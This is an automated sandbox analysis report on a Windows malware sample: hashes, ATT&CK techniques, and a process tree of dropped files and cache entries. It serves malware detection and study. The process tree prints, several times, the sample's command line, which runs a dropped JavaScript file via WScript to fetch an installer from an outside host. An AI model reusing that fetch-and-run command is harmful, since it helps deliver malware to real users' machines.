baf3cf480bf1c409ce3c9cbb139ba4bb8f70de0df0430d7d733f8b0f3a65e7ac

Analysis

max time kernel
118s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
15/09/2024, 10:15

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe
Size

184KB
MD5

e13df6706bc492838bdd1ff9f8d814d6
SHA1

f271e68e4a4d42e016def4bf3771e9d6033fcf68
SHA256

baf3cf480bf1c409ce3c9cbb139ba4bb8f70de0df0430d7d733f8b0f3a65e7ac
SHA512

6b586b9ad7b176a8f336872ee202d141804490a92591328a0edd53dc943e50c5af6084bb7f773d6eb9b465459076b9c3521a5d42a80f4bfce56cd2943724fb9a
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3q:/7BSH8zUB+nGESaaRvoB7FJNndnX

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2064	WScript.exe
8	2064	WScript.exe
10	2064	WScript.exe
12	2948	WScript.exe
13	2948	WScript.exe
15	1400	WScript.exe
16	1400	WScript.exe
18	1596	WScript.exe
19	1596	WScript.exe
21	2088	WScript.exe
22	2088	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1384	2112	WerFault.exe	29

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2112 wrote to memory of 2064	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	30
PID 2112 wrote to memory of 2064	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	30
PID 2112 wrote to memory of 2064	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	30
PID 2112 wrote to memory of 2064	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	30
PID 2112 wrote to memory of 2948	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	33
PID 2112 wrote to memory of 2948	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	33
PID 2112 wrote to memory of 2948	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	33
PID 2112 wrote to memory of 2948	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	33
PID 2112 wrote to memory of 1400	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	35
PID 2112 wrote to memory of 1400	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	35
PID 2112 wrote to memory of 1400	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	35
PID 2112 wrote to memory of 1400	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	35
PID 2112 wrote to memory of 1596	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	37
PID 2112 wrote to memory of 1596	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	37
PID 2112 wrote to memory of 1596	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	37
PID 2112 wrote to memory of 1596	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	37
PID 2112 wrote to memory of 2088	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	39
PID 2112 wrote to memory of 2088	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	39
PID 2112 wrote to memory of 2088	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	39
PID 2112 wrote to memory of 2088	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	39
PID 2112 wrote to memory of 1384	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	41
PID 2112 wrote to memory of 1384	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	41
PID 2112 wrote to memory of 1384	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	41
PID 2112 wrote to memory of 1384	2112	2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe	41

C:\Users\Admin\AppData\Local\Temp\2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe
"C:\Users\Admin\AppData\Local\Temp\2024-09-15_e13df6706bc492838bdd1ff9f8d814d6_mafia.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2112
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufC6B9.js" http://www.djapp.info/?domain=WwoiZOGmdd.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjQiodRIIVA0RmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4W8ARNmNAMCdXMWAnI7ZWcJfndWFTQ8Ceizxfr7RVJSNKY6xJX C:\Users\Admin\AppData\Local\Temp\fufC6B9.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2064
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufC6B9.js" http://www.djapp.info/?domain=WwoiZOGmdd.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjQiodRIIVA0RmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4W8ARNmNAMCdXMWAnI7ZWcJfndWFTQ8Ceizxfr7RVJSNKY6xJX C:\Users\Admin\AppData\Local\Temp\fufC6B9.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2948
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufC6B9.js" http://www.djapp.info/?domain=WwoiZOGmdd.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjQiodRIIVA0RmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4W8ARNmNAMCdXMWAnI7ZWcJfndWFTQ8Ceizxfr7RVJSNKY6xJX C:\Users\Admin\AppData\Local\Temp\fufC6B9.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1400
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufC6B9.js" http://www.djapp.info/?domain=WwoiZOGmdd.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjQiodRIIVA0RmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4W8ARNmNAMCdXMWAnI7ZWcJfndWFTQ8Ceizxfr7RVJSNKY6xJX C:\Users\Admin\AppData\Local\Temp\fufC6B9.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:1596
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufC6B9.js" http://www.djapp.info/?domain=WwoiZOGmdd.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjQiodRIIVA0RmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4W8ARNmNAMCdXMWAnI7ZWcJfndWFTQ8Ceizxfr7RVJSNKY6xJX C:\Users\Admin\AppData\Local\Temp\fufC6B9.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2088
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 556
  2⤵
  - Program crash
  PID:1384

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
12f2423ff838166184443b10db7bde95

SHA1
e857ff470b6a03b85063a828824fcf8e72bd77fd

SHA256
bf4e327d47fae7b6d42d467e3ead8a50916faa1b3e824bb5e9825e3c7f2b1200

SHA512
b0a76882df19a4b3fdc8ae842423d8a6403963c46a5cd6ad7d5532d280bc03851bdee67b8787987955e250584582d9ab6e3595c9be7bfdc3b0ce843c7437d900

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
d9894b0fca59f12f6ae795deb18f7a42

SHA1
8f927c141dd7864b5caaf002a89a454f323a548f

SHA256
64f983ab494a82f749275698cd622bf3eb450fa9035db7e94aa19a2aad8b3f3b

SHA512
88a5c33bc9c163a528dbe492112d0e19069687d536ce654bdb37a528c91fafe1bbdc5fc68ee5392b75134b24dda57a81e7b6380579c22b3c4ed9857b00fdb703

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BQQODH7V\domain_profile[1].htm

Filesize
6KB

MD5
d16077fdced8d1c825eeb77c979c8cbf

SHA1
4d9a5fb62b95aa51df02f7646b3e5e65dc86e169

SHA256
0adec67478ec3666955f5d734a0b5c4c22042c8947f6b34de41a533f7d736670

SHA512
7b1b3157e9259012d497acb2d17581a3a88eac6b7284ef8df893b007c1b66376d10fa2a0f5d9ae269c892c3138917a25bf9ad6bbbcb9d6b3a92d6838c3020270

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BQQODH7V\domain_profile[1].htm

Filesize
6KB

MD5
b42a22913e6dd8925e37eab60455663d

SHA1
51ab1db62cffa03a20ecb29a06fe23e978b9c2c0

SHA256
f398e0637405687bd2154291bd65cacbc0260b615fe223962f86e26cbebca80e

SHA512
d9ffec32ca3313d4e50b63e39d804320fed5a6827b8d0f1677a21cd710e094ebf85d3da4e13bbf3a03916ec3328ccb8e72801ac772b6e841c8e3626489c18552

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8UFEBH5\domain_profile[1].htm

Filesize
6KB

MD5
97df1d4459769c568970892a265ee6f8

SHA1
8b42c4f0c1e6347bafb8356c369f6461a3025bfb

SHA256
db49c9c4f7f6dbb3c6fdce624d4a867822dc3ffa0284ed6e04b9be9d0d12918f

SHA512
f305d2228abbb222d13e830fab3d97603eacd2288e58b6f4f59dec11a3ef6ecb53ef23b0cfc85fc6a4a2fee715ecc69ed37d6cde2acd576b843d15a08367e576

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8UFEBH5\domain_profile[1].htm

Filesize
6KB

MD5
e7474ace7e4efc70b9ea227a8309be03

SHA1
d88721c96e00828e84aefca90f7ca48693fc5ff4

SHA256
181bb2e6157271bf319046d30fb3eefc910f41e6c0e26bd43df4d4a14de44b94

SHA512
8db9051a00bcf9505f9959ab3ff77a9df9ee7b5d7d6b6f7241ef2be342e2c903cc28ed9f161dc44c9643deaf68cb4b9cdd70550ab0c88288110e9da7df6df68c

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabF0E.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar276F.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufC6B9.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\F01LSXTW.txt

Filesize
175B

MD5
b78781a7d258096037fec5cdfc2e5d8f

SHA1
8039d8f479cd171afc8e002f8c01890c6a9b1791

SHA256
022077328343c08e5822b755528a5b502d9bc1b289bc0f1442502c37aabd50a3

SHA512
6bae5dc33347e9fd22e2b58039c927baf8417939fb26d8536a2700045a8ed233945f403c3e46b4253cd59c5887acc38df049a97f7ae509457816adc0f9a6a4d2

Download Submit